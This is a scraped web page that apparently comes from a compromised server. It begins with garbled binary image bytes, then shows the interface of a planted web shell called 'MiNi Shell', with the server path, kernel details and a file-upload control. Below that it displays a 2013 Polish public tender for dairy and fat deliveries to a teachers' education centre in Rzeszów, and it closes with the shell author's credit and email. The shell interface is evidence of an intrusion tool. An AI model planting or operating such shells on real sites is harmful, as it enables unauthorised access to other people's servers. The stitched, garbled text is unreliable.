JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130205/49014-N-2013.html

<p class="kh_header"><b>Rzeszów: Sukcesywna dostawa artykułów mleczarskich i tłuszczy dla potrzeb PCEN w Rzeszowie wraz z Oddziałami.</b><br>
<b>Numer ogłoszenia: 49014 - 2013; data zamieszczenia: 05.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podkarpackie Centrum Edukacji Nauczycieli w Rzeszowie , ul. Niedzielskiego 2, 35-036 Rzeszów, woj. podkarpackie, tel. 17 8534097, faks 17 8534682.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcen.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa artykułów mleczarskich i tłuszczy dla potrzeb PCEN w Rzeszowie wraz z Oddziałami..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów mleczarskich  i tłuszczy dla potrzeb PCEN w Rzeszowie wraz z Oddziałami. 
Przedmiot zamówienia został podzielony na następujące części:
Część I-sukcesywna dostawa artykułów mleczarskich i tłuszczy do lokalizacji PCEN Rzeszów, Oddział w Tarnobrzegu, 39-400 Tarnobrzeg, ul. Sienkiewicza 206.
Bita śmietana spray opakowanie 250 ml 10szt., Jogurt grecki opakowanie 350-400g  10 szt., Jogurt owocowy opakowanie 150g mix smaków 1250 szt., Jogurt naturalny opakowanie 340g 10 szt., Masło extra 200g  82 % tłuszczu 500 szt., Mleko UHT 2% karton z możliwością wielokrotnego otwierania i zamykania 1L  250 szt.  Mleko UHT 3,2%  karton z możliwością wielokrotnego otwierania i zamykania 1L 10 szt.  Olej uniwersalny opakowanie 5l  100 szt.  Oliwa z oliwek  opakowanie 750ml  5 szt.  Ser biały półtłusty 50 kg Ser camembert  opakowanie120-180g  20 szt.  Ser miękki w kostce sałatko-kanapkowy opakowanie 200-270 G  45 szt.  Ser żółty typu gouda 50 kg Ser żółty typu edamski 50 kg, Serek śmietankowy plastry opakowanie 150g  5 op. ,Serek topiony min. 8 porcji krążek różne smaki opakowanie 140-200g,  5 op. Serek  ziarnisty opakowanie 200 g  20 szt. Śmietana 18% opakowanie 200g  250 szt., Śmietana 22% opakowanie 1000 g  15 szt., Śmietana  22% opakowanie 200g 5  szt., Śmietanka w płynie do kawy opakowanie 10sztx10 ml  200 op. 

Część II-sukcesywna dostawa artykułów mleczarskich i tłuszczy do lokalizacji PCEN Rzeszów OENiPAS w Czudcu, 38-120 Czudec, ul. Rzeszowska 82.
OLEJ 100% palmowy do głębokiego smażenia opakowanie 20L 1SZT ,JOGURT kremowy niezmieszany z wsadem owocowym lub żelkami lub chrupkami. Jogurt i wsad w odrębnych komorach -opakowanie  120-150G 200 SZT, JOGURT owocowy opakowanie 150G 2000 SZT, JOGURT NATURALNY opakowanie 400 ML 10 SZT ,MARGARYNA roślinna do smarowania opakowanie 500G 90 SZT, MASŁO ekstra 82 % tłuszczu kostka 200 G 700 SZT, Masło do smarowania opakowanie 200 G  250 SZT, MLEKO UHT 3,2% karton z możliwością wielokrotnego otwierania i zamykania 0,5L 110 SZT, MLEKO UHT 3,2%  karton z możliwością wielokrotnego otwierania i zamykania 1L 800 SZT, MLEKO UHT 1,5% karton z możliwością wielokrotnego otwierania i zamykania  1L 15 SZT, OLEJ spożywczy roślinny opakowanie  1L 70 SZT, OLEJ spożywczy roślinny opakowanie 5L 110 SZT, OLIWA z oliwek opakowanie 0,5L 3 SZT, SER żółty inny niż EDAMSKI, GOUDA, SALAMI, KRÓLEWSKI i w pozycji 31 20 KG, SER BIAŁY PÓŁTŁUSTY 140 KG SER SMIETANKOWY W PLASTRACH opakowanie150G  15 SZT, SER camembert opakowanie 120-180G  250 SZT, SER miękki w kostce sałatko-kanapkowy opakowanie 200-270 G 38 SZT, SER biały puszysty do smarowania opakowanie 140-150G 60 SZT, SER topiony min.8 porcji KRĄŻEK różne smaki opakowanie 140-200G 350 SZT, SER żółty PLASTRY  opakowanie 150G 20 SZT ,SER  typu MOZZARELLA opakowanie 125G 5 SZT, SER PLEŚNIOWY opakowanie 100-150 G 15 SZT, SER WĘDZONY typu GOUDA 15 KG, SER WĘDZONY  typu ZAMOJSKI 24 KG, SER WĘDZONY typu ROLADA USTRZYCKA 10 KG, SER ŻÓŁTY typu GOUDA  50 KG, SER ŻÓŁTY typu EDAMSKI 60 KG, SER WĘDZONY typu KRÓLEWSKI 10 KG, SER ŻÓŁTY typu KRÓLEWSKI 55 KG, SER żółty inny niż EDAMSKI, GOUDA, SALAMI, KRÓLEWSKI i w pozycji 14 20 KG, SER ŻÓŁTY typu SALAMI  35 KG, SEREK ZIARNISTY opakowanie 200G 55 SZT, SMALEC domowy opakowanie 250-300 G 20 SZT, SMIETANA 18% opakowanie 380-400 G 1150 SZT, SMIETANKA W PŁYNIE DO KAWY opakowanie 10sztX10ml 600 OP, Bita śmietana spray opakowanie 250 ml 10 SZT, ŚMIETANA  12-15% opakowanie 1L 25 SZT.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.40.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca ubiegający się o udzielenie zamówienia publicznego zobowiązany jest złożyć: a.Wypełniony druk Oferta- załącznik nr 2. Dla uznania ważności, oferta musi zawierać: wszystkie wymagane w SIWZ dokumenty, które należy przedstawić w formie oryginałów lub poświadczone za zgodność z oryginałem ich kopie. Poświadczenie powinno być opatrzone podpisem osoby upoważnionej do reprezentowania Wykonawcy i opatrzone klauzulą ZA ZGODNOŚĆ Z ORYGINAŁEM., b.Upoważnienie do reprezentowania Wykonawcy (w przypadku gdy nie wynika ono z załączonych dokumentów) - np. według załącznika nr 4,c.W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia musi być załączone pełnomocnictwo zgodnie z art. 23 ust. 2 ustawy. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie (w formie oryginału) tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej umowy w zakresie:a.zmiany wynagrodzenia wykonawcy za wykonanie zamówienia, w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym ustawowej stawki podatku od towarów i usług, b.zmiany terminu wykonania zamówienia w przypadku wystąpienia:-siły wyższej. Siła wyższa-oznacza wydarzenie nieprzewidywalne i poza kontrolą stron umowy występujące po podpisaniu umowy, a powodujące niemożliwość wywiązywania się z umowy w jej obecnym brzmieniu,-innych uzasadnionych przyczyn pod warunkiem, że zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Jeżeli Zamawiający uzna, że zaistniałe okoliczności stanowiące podstawę do zmiany w umowie nie są zasadne, Wykonawca zobowiązany jest do realizacji zadania zgodnie z zawartą umową.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pcen.pl/zamowienia-publiczne/postepowania-powyzej-14-tys.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Podkarpackie Centrum Edukacji Nauczycieli w Rzeszowie, 
35-036 Rzeszów, ul. Niedzielskiego 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.02.2013 godzina 10:00, miejsce: Podkarpackie Centrum Edukacji Nauczycieli w Rzeszowie, 
35-036 Rzeszów, ul. Niedzielskiego 2, Pokój nr 1 (Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów mleczarskich  i tłuszczy dla potrzeb PCEN w Rzeszowie wraz z Oddziałami w tym na potrzeby projektów systemowych współfinansowanych ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego:Podkarpackie szkolenie informatyczno-metodyczne, Edukacja skuteczna, przyjazna, nowoczesna-rozwój kompetencji kadry zarządzającej i pedagogicznej szkół i placówek oświatowych w województwie podkarpackim.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sukcesywna dostawa artykułów mleczarskich i tłuszczy do lokalizacji PCEN Rzeszów, Oddział w Tarnobrzegu, 39-400 Tarnobrzeg, ul. Sienkiewicza 206.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bita śmietana spray opakowanie 250 ml 10szt., Jogurt grecki opakowanie 350-400g  10 szt., Jogurt owocowy opakowanie 150g mix smaków 1250 szt., Jogurt naturalny opakowanie 340g 10 szt., Masło extra 200g  82 % tłuszczu 500 szt., Mleko UHT 2% karton z możliwością wielokrotnego otwierania i zamykania 1L  250 szt.  Mleko UHT 3,2%  karton z możliwością wielokrotnego otwierania i zamykania 1L 10 szt.  Olej uniwersalny opakowanie 5l  100 szt.  Oliwa z oliwek  opakowanie 750ml  5 szt.  Ser biały półtłusty 50 kg Ser camembert  opakowanie120-180g  20 szt.  Ser miękki w kostce sałatko-kanapkowy opakowanie 200-270 G  45 szt.  Ser żółty typu gouda 50 kg Ser żółty typu edamski 50 kg, Serek śmietankowy plastry opakowanie 150g  5 op. ,Serek topiony min. 8 porcji krążek różne smaki opakowanie 140-200g,  5 op. Serek  ziarnisty opakowanie 200 g  20 szt. Śmietana 18% opakowanie 200g  250 szt., Śmietana 22% opakowanie 1000 g  15 szt., Śmietana  22% opakowanie 200g 5  szt., Śmietanka w płynie do kawy opakowanie 10sztx10 ml  200 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.40.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sukcesywna dostawa artykułów mleczarskich i tłuszczy do lokalizacji PCEN Rzeszów OENiPAS w Czudcu, 38-120 Czudec, ul. Rzeszowska 82.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OLEJ 100% palmowy do głębokiego smażenia opakowanie 20L 1SZT ,JOGURT kremowy niezmieszany z wsadem owocowym lub żelkami lub chrupkami. Jogurt i wsad w odrębnych komorach -opakowanie  120-150G 200 SZT, JOGURT owocowy opakowanie 150G 2000 SZT, JOGURT NATURALNY opakowanie 400 ML 10 SZT ,MARGARYNA roślinna do smarowania opakowanie 500G 90 SZT, MASŁO ekstra 82 % tłuszczu kostka 200 G 700 SZT, Masło do smarowania opakowanie 200 G  250 SZT, MLEKO UHT 3,2% karton z możliwością wielokrotnego otwierania i zamykania 0,5L 110 SZT, MLEKO UHT 3,2%  karton z możliwością wielokrotnego otwierania i zamykania 1L 800 SZT, MLEKO UHT 1,5% karton z możliwością wielokrotnego otwierania i zamykania  1L 15 SZT, OLEJ spożywczy roślinny opakowanie  1L 70 SZT, OLEJ spożywczy roślinny opakowanie 5L 110 SZT, OLIWA z oliwek opakowanie 0,5L 3 SZT, SER żółty inny niż EDAMSKI, GOUDA, SALAMI, KRÓLEWSKI i w pozycji 31 20 KG, SER BIAŁY PÓŁTŁUSTY 140 KG SER SMIETANKOWY W PLASTRACH opakowanie150G  15 SZT, SER camembert opakowanie 120-180G  250 SZT, SER miękki w kostce sałatko-kanapkowy opakowanie 200-270 G 38 SZT, SER biały puszysty do smarowania opakowanie 140-150G 60 SZT, SER topiony min.8 porcji KRĄŻEK różne smaki opakowanie 140-200G 350 SZT, SER żółty PLASTRY  opakowanie 150G 20 SZT ,SER  typu MOZZARELLA opakowanie 125G 5 SZT, SER PLEŚNIOWY opakowanie 100-150 G 15 SZT, SER WĘDZONY typu GOUDA 15 KG, SER WĘDZONY  typu ZAMOJSKI 24 KG, SER WĘDZONY typu ROLADA USTRZYCKA 10 KG, SER ŻÓŁTY typu GOUDA  50 KG, SER ŻÓŁTY typu EDAMSKI 60 KG, SER WĘDZONY typu KRÓLEWSKI 10 KG, SER ŻÓŁTY typu KRÓLEWSKI 55 KG, SER żółty inny niż EDAMSKI, GOUDA, SALAMI, KRÓLEWSKI i w pozycji 14 20 KG, SER ŻÓŁTY typu SALAMI  35 KG, SEREK ZIARNISTY opakowanie 200G 55 SZT, SMALEC domowy opakowanie 250-300 G 20 SZT, SMIETANA 18% opakowanie 380-400 G 1150 SZT, SMIETANKA W PŁYNIE DO KAWY opakowanie 10sztX10ml 600 OP, Bita śmietana spray opakowanie 250 ml 10 SZT, ŚMIETANA  12-15% opakowanie 1L 25 SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.40.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com